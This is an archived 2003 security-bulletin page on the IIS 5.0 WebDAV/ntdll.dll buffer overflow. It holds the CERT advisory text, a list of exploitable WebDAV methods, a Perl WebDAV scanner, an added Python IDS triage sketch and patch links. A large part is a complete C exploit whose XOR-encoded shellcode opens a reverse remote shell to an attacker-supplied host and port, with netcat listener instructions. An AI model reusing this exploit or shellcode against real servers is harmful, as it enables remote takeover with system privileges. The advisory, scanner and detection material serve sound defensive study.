18th Mar 2003 [SBWID-6073]
COMMAND
	IIS remote buffer overflow due to WebDAV/ntdll.dll
SYSTEMS AFFECTED
	IIS 5.0
PROBLEM
	In CERT Advisory [CA-2003-09] :
	
	 http://www.cert.org/advisories/CA-2003-09.html
	
	--snip--
	 IIS  5.0 includes support for WebDAV, which allows users to manipulate
	 files   stored   on   a   web  server  (RFC2518).  A  buffer  overflow
	 vulnerability  exists  in ntdll.dll (a portion of code utilized by the
	 IIS  WebDAV  component).  By sending a specially crafted request to an
	 IIS  5.0  server, an attacker may be able to execute arbitrary code in
	 the  Local  System  security  context, essentially giving the attacker
	 complete control of the system.
	--snap--
	 Update (19 March 2003)
	 ======
	Brett Moore [[email protected]] adds :
	Also if anyone is writing IDS or filtering systems, most of  the  webdav
	methods can be used to exploit this.
	These are some that I have found that can lead to exploitation.
	
	LOCK
	SEARCH
	PROPFIND
	COPY
	MKCOL
	
	-Also-
	SensePost Research [http://www.sensepost.com] wrote  a  WebDAV  scanning
	tool :
	
	> head -n 9 finder.pl
	#!/bin/perl
	##
	## This script test for most of the methods used by WebDAV
	## If the server does not complain about the method its an indication
	## that WebDAV is in use..
	##
	## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
	## for info why this is interesting..
	##
	
	Typical output:
	
	> perl finder.pl www.blah.co.za 80
	Testing WebDAV methods [www.blah.co.za 80]
	-------------------------------------
	www.blah.co.za : Server type is Microsoft-IIS/5.0
	Method PROPFIND seems to be allowed - WebDAV possibly in use
	Method PROPPATCH seems to be allowed - WebDAV possibly in use
	Method MCOL seems to be allowed - WebDAV possibly in use
	Method PUT seems to be allowed - WebDAV possibly in use
	Method DELETE seems to be allowed - WebDAV possibly in use
	Method LOCK seems to be allowed - WebDAV possibly in use
	Method UNLOCK seems to be allowed - WebDAV possibly in use
	> perl finder.pl  www.moreblah.com 80
	Testing WebDAV methods [www.moreblah.com 80]
	-------------------------------------
	www.moreblah.com : Server type is Microsoft-IIS/5.0
	Method PROPFIND is not allowed
	Method PROPPATCH is not allowed
	Method MCOL is not allowed
	Method PUT is not allowed
	Method DELETE is not allowed
	Method LOCK is not allowed
	Method UNLOCK is not allowed
	
	
	#!/bin/perl
	##
	## This script test for most of the methods used by WebDAV
	## If the server does not complain about the method its an indication
	## that WebDAV is in use..
	##
	## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
	## for info why this is interesting..
	##
	## SensePost Research
	## [email protected]
	## 2003/3/17
	## RT
	$|=1;
	use Socket;
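	# Methods probed. "MCOL" is sent exactly as written here; RFC 2518 names the method MKCOL.
	@methods = ("PROPFIND","PROPPATCH","MCOL","PUT","DELETE","LOCK","UNLOCK");
	if ($#ARGV<1){die "parameters: IP/dns_name port\n";}
	# Scalar element access is $ARGV[n]; @ARGV[n] is a one-element slice.
	$target=$ARGV[0];
	$port=$ARGV[1];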
	print "Testing WebDAV methods [$target $port]\n-------------------------------------\n";
	@results=sendraw2("HEAD / HTTP/1.0\r\n\r\n",$target,$port,15);
	if ($#results < 1){die "15s timeout to $target on port $port\n";}
	foreach $line (@results){
		if ($line =~ /Server:/){
			($left,$right)=split(/\:/,$line);
			$right =~ s/ //g; 
			print "$target : Server type is $right";
			if ($right !~ /Microsoft-IIS\/5.0/i){
				print "$target : Not a Microsoft IIS 5 box\n";
				exit(0);
			}
		}
	}
	foreach $method (@methods){
		@results=sendraw2("$method /test/nothere HTTP/1.0\r\n\r\n",$target,$port,15);
		if ($#results < 1){print "15s timeout to $target on port $port\n";}
		 $okflag=0;
		 foreach $line (@results){
			if ($line =~ /Method Not Supported/i){
				print "Method $method is not allowed\n";
				$okflag=1;
			}
			if (($line =~ /method/i) && ($line =~ /not allowed/i)){
				print "Method $method is not allowed\n";
				$okflag=1;
			}
		}
		if ($okflag==0){
			print "Method $method seems to be allowed - WebDAV possibly in use\n";
		}
	}
	########## Sendraw-2
	sub sendraw2 {
	        my ($pstr,$realip,$realport,$timeout)=@_;
	        my $target2 = inet_aton($realip);
	        my $flagexit=0;
	        $SIG{ALRM}=\&ermm;
	        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
	        alarm($timeout);
	        if (connect(S,pack "SnA4x8",2,$realport,$target2)){
	                alarm(0);
	                my @in;
	                select(S); $|=1;
	                print $pstr;
	                alarm($timeout);
	                while(<S>){
	                        if ($flagexit == 1){
	                                close (S);
	                                print STDOUT "Timeout\n";
	                                return "Timeout";
	                        }
	                        push @in, $_;
	                }
	                alarm(0);
	                select(STDOUT);
	                close(S);
	                return @in;
	        } else {return "0";}
	}
	sub ermm{
	        $flagexit=1;
	        close (S);
	}
	
	 Update (22 March 2003)
	 ======
	David Litchfield of NGSSoftware Ltd  [http://www.ngssoftware.com/]  adds
	:
	The patch announced  by  Microsoft  on  the  17th  March  2003  fixed  a
	security vulnerability  in  the  core  of  the  Windows  2000  operating
	system. This flaw was actively being exploited through  WebDAV  requests
	to Microsoft's Internet Information Server 5. It must be  stressed  that
	IIS was simply the attack vector; the method or route used  to  actually
	exploit the flaw. The problem, however, is  much  wider  in  scope  than
	just simply  machines  running  IIS.  Researchers  at  NGSSoftware  have
	isolated many more attack vectors including java based web  servers  and
	other non-WebDAV related issues in IIS. Due to  this,  NGSSoftware  urge
	Windows 2000 users to apply the patch.
	For a paper that examines the vulnerability in detail, please read :
	
	 http://www.ngssoftware.com/papers/ms03-007-ntdll.pdf
	
	 Update (24 March 2003)
	 ======
	Thanks to Rafael Núñez [[email protected]] [http://www.scientech.com.ve],
	Senior Research Scientist :
	
	/*******************************************************************/
	/*     [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]     */
	/* --------------------------------------------------------------- */
	/*     this is the exploit for ntdll.dll through WebDAV.           */
	/*     run a netcat ex: nc -L -vv -p 666                           */
	/*     wb server.com your_ip 666 0                                 */
	/*     the shellcode is a reverse remote shell                     */
	/*     you need to pad a bit.. the best way I think is launching   */
	/*     the exploit with pad = 0 and after that, the server will be */
	/*     down for a couple of seconds, now retry with pad at 1       */
	/*     and so on..pad 2.. pad 3.. if you haven't the shell after   */
	/*     something like pad at 10 I think you better to restart from */
	/*     pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
	/*     on all the others servers it was at 2,3,4, etc..sometimes   */
	/*     you can have the force with you, and get the shell in 1 try */
	/*     sometimes you need to pad more than 10 times ;)             */
	/*     the shellcode was coded by myself, it is SEH + ScanMem to   */
	/*     find the famous offsets (GetProcAddress)..                  */
	/*     I know I code like a pig, my english sucks, and my tech too */
	/*     it is my first exploit..and my first shellcode..sorry :P    */
	/*     if you have comments feel free to mail me at:               */
	/*     mailto: [email protected]                               */
	/*     or visit us at www.coromputer.net . You can speak with us   */
	/*     at IRC undernet channel #coromputer                         */
	/*     ok now the greetz:                                          */
	/*     [El0d1e] to help me find some information about the bug :)  */
	/*     tuck_ to support me ;)                                      */
	/*     and all my friends in coromputer crew! hein les poulets! =) */
	/*                                                                 */
	/*     Tested by Rafael [RaFa] Nunez  [email protected]      */
	/*                                                                 */
	/*     (take off the WSAStartup, change the closesocket, change    */
	/*       headers and it will run on linux boxes ;pPpPpP ).         */
	/*                                                                 */
	/*******************************************************************/
	#include <winsock.h>
	#include <windows.h>
	#include <stdio.h>
	#pragma comment (lib,"ws2_32")
	char shellc0de[] =
	        "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
	        "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
	        "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
	        "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
	        "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
	        "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
	        "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
	        "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
	        "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
	        "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
	        "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
	        "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
	        "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
	        "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
	        "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
	        "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
	        "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
	        "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
	        "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
	        "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
	        "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
	        "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
	        "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
	        "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
	        "\xff\xd0"
	        "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
	        "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
	        "cmd" // don't change anything..
	        "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
	        "\x00\x00\xe8\x77"
	        "\x00\x00\xf0\x77"
	        "\x00\x00\xe4\x77"
	        "\x00\x88\x3e\x04" // win2k3
	        "\x00\x00\xf7\xbf" // win9x =P
	        "\xff\xff\xff\xff";
	int test_host(char *host)
	{
	      char search[100]="";
	      int sock;
	      struct hostent *heh;
	      struct sockaddr_in hmm;
	      char buf[100] ="";
	      if(strlen(host)>60) {
	            printf("error: victim host too long.\r\n");
	            return 1;
	      }
	  if ((heh = gethostbyname(host))==0){
	    printf("error: can't resolve '%s'",host);
	    return 1;
	  }
	  sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
	  hmm.sin_port = htons(80);
	  hmm.sin_family = AF_INET;
	  hmm.sin_addr = *((struct in_addr *)heh->h_addr);
	  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	    printf("error: can't create socket");
	    return 1;
	  }
	  printf("Checking WebDav on '%s' ... ",host);
	  if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
	    printf("CONNECTING_ERROR\r\n");
	    return 1;
	  }
	      send(sock,search,strlen(search),0);
	      recv(sock,buf,sizeof(buf),0);
	if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
	      return 0;
	      printf("NOT FOUND\r\n");
	      return 1;
	}
	void help(char *program)
	{
	      printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
	      return;
	}
	void banner(void)
	{
	      printf("\r\n\t  [Crpt] ntdll.dll exploit trough WebDAV by kralor
	[Crpt]\r\n");
	      printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
	      return;
	}
	void main(int argc, char *argv[])
	{
	      WSADATA wsaData;
	      unsigned short port=0;
	      char *port_to_shell="", *ip1="", data[50]="";
	      unsigned int i,j;
	      unsigned int ip = 0 ;
	      int s, PAD=0x10;
	      struct hostent *he;
	      struct sockaddr_in crpt;
	      char buffer[65536] ="";
	      char request[80000];    // huuuh, what a mess! :)
	      char content[] =
	           "<?xml version=\"1.0\"?>\r\n"
	           "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
	           "<g:sql>\r\n"
	           "Select \"DAV:displayname\" from scope()\r\n"
	           "</g:sql>\r\n"
	           "</g:searchrequest>\r\n";
	      banner();
	      if((argc<4)||(argc>5)) {
	            help(argv[0]);
	            return;
	      }
	if(WSAStartup(0x0101,&wsaData)!=0) {
	      printf("error starting winsock..");
	      return;
	      }
	if(test_host(argv[1]))
	      return;
	if(argc==5)
	      PAD+=atoi(argv[4]);
	printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
	      ip = inet_addr(argv[2]); ip1 = (char*)&ip;
	shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
	shellc0de[451]=ip1[3];
	      port = htons(atoi(argv[3]));
	      port_to_shell = (char *) &port;
	      shellc0de[446]=port_to_shell[0];
	      shellc0de[447]=port_to_shell[1];
	// we xor the shellcode [xored by 0x95 to avoid bad chars]
	 __asm {
	  lea eax, shellc0de
	  add eax, 0x34
	xor ecx, ecx
	mov cx, 0x1b0
	wah:
	xor byte ptr[eax], 0x95
	inc eax
	loop wah
	}
	  if ((he = gethostbyname(argv[1]))==0){
	    printf("error: can't resolve '%s'",argv[1]);
	    return;
	  }
	  crpt.sin_port = htons(80);
	  crpt.sin_family = AF_INET;
	  crpt.sin_addr = *((struct in_addr *)he->h_addr);
	  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	    printf("error: can't create socket");
	    return;
	  }
	  printf("Connecting... ");
	  if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
	    printf("ERROR\r\n");
	    return;
	  }
	// No Operation.
	for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
	// fill the buffer with the shellcode
	for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
	// well..it is not necessary..
	for(i=0;i<2500;buffer[i]=PAD,i++);
	/* we can simply put our ret in this 2 offsets.. */
	//buffer[2086]=PAD;
	//buffer[2085]=PAD;
	      buffer[sizeof(buffer)]=0x00;
	      memset(request,0,sizeof(request));
	      memset(data,0,sizeof(data));
	      sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
	      sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
	      printf("CONNECTED\r\nSending evil request... ");
	      send(s,request,strlen(request),0);
	      send(s,content,strlen(content),0);
	      printf("SENT\r\n");
	      recv(s,data,sizeof(data),0);
	      if(data[0]!=0x00) {
	      printf("Server seems to be patched.\r\n");
	      printf("data: %s\r\n",data);
	      } else
	      printf("Now if you are lucky you will get a shell.\r\n");
	      closesocket(s);
	      return;
	}
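
	For the IDS and filtering use Brett Moore raises above, the sketch below triages HTTP request lines by the shape this page shows: a DAV method carrying a request-URI of roughly 64 KB. It is an added example, not code from any of the posts; the names Finding, classify and SAMPLES, the verdict labels and the 2048-byte ceiling are assumptions, and the sample requests are constructed with benign filler.

```python
# Added example: request-line triage for the WebDAV vector described on this page.
from typing import NamedTuple, Optional, Tuple

# Methods named on this page (Brett Moore's list plus the DAV methods finder.pl
# probes), spelled per RFC 2518. Keying on SEARCH alone would miss the others.
WEBDAV_METHODS = frozenset(
    {"LOCK", "UNLOCK", "SEARCH", "PROPFIND", "PROPPATCH", "COPY", "MKCOL"}
)
MAX_URI_LEN = 2048  # assumption: tune to the longest URI the site legitimately serves


class Finding(NamedTuple):
    method: str
    uri_len: int
    raw_odd_bytes: bool  # bytes outside printable ASCII sent unencoded in the URI
    verdict: str         # "ok", "webdav", "suspicious", "alert" or "malformed"


def parse_request_line(raw: bytes) -> Optional[Tuple[str, bytes]]:
    """Return (method, uri) from the first line of a request, or None."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    # Method ends at the first space and the version starts after the last one,
    # so a URI that itself contains spaces is still measured in full.
    method, sep1, rest = line.partition(b" ")
    uri, sep2, version = rest.rpartition(b" ")
    if not (sep1 and sep2 and uri and method.isalpha()
            and version.startswith(b"HTTP/")):
        return None
    return method.decode("ascii"), uri


def classify(raw: bytes, max_uri_len: int = MAX_URI_LEN) -> Finding:
    parsed = parse_request_line(raw)
    if parsed is None:
        return Finding("", 0, False, "malformed")
    method, uri = parsed
    method = method.upper()  # conservative: match regardless of case
    odd = any(b < 0x21 or b > 0x7E for b in uri)
    oversize = len(uri) > max_uri_len
    if method in WEBDAV_METHODS:
        # DAV method plus oversized or binary URI is the shape shown on this page.
        verdict = "alert" if (oversize or odd) else "webdav"
    else:
        verdict = "suspicious" if (oversize or odd) else "ok"
    return Finding(method, len(uri), odd, verdict)


# Constructed sample requests (filler is the letter "A", not a payload).
SAMPLES = {
    "plain_get": b"GET /index.html HTTP/1.0\r\n\r\n",
    "probe": b"PROPFIND /test/nothere HTTP/1.0\r\n\r\n",  # finder.pl-style probe
    "long_search": b"SEARCH /" + b"A" * 65536
                   + b" HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "long_lock": b"LOCK /" + b"A" * 65536
                 + b" HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "long_get": b"GET /" + b"A" * 5000 + b" HTTP/1.0\r\n\r\n",
    "not_http": b"\x16\x03\x01\x00\x2e",
}


def triage(samples):
    """Map each sample name to its verdict."""
    return {name: classify(raw).verdict for name, raw in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:12s} {verdict}")
```

	A "webdav" verdict on a server that is not meant to offer WebDAV is itself worth blocking at the filter; as the 22 March update notes, IIS is only one route to the flaw, so this check does not replace the patch.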
	
	 Update (26 March 2003)
	 ======
	Roman Medina [[email protected]] adds :
	I wrote another exploit for the nt.dll bug some  days  ago.  Explanation
	and a little documentation is included in the source file.  It  compiles
	in Linux/gcc without any error.
	
	http://www.rs-labs.com/exploitsntools/rs_iis.c
	
	-Also-
	Mat [[email protected]] posts :
	
	
SOLUTION
	Windows 2000: Registry Tool for  Security  Patch:  Unchecked  buffer  in
	Windows component could cause web server compromise
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=48b3a74e-a4af-41d6-bdec-1b6104648647&DisplayLang=en
	
	Windows  2000:  Active  Directory  Group  Policy  for  Security   Patch:
	Unchecked buffer in Windows component could cause web server compr
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=a3b109d3-6f0e-4b1c-a723-976566fc1b53&DisplayLang=en
	
	Windows  2000  Security  Patch:  IIS  Remote  Exploit   from   ntdll.dll
	vulnerability
	
	http://www.microsoft.com/downloads/details.aspx?FamilyID=c9a38d45-5145-4844-b62e-c69d32ac929b&DisplayLang=en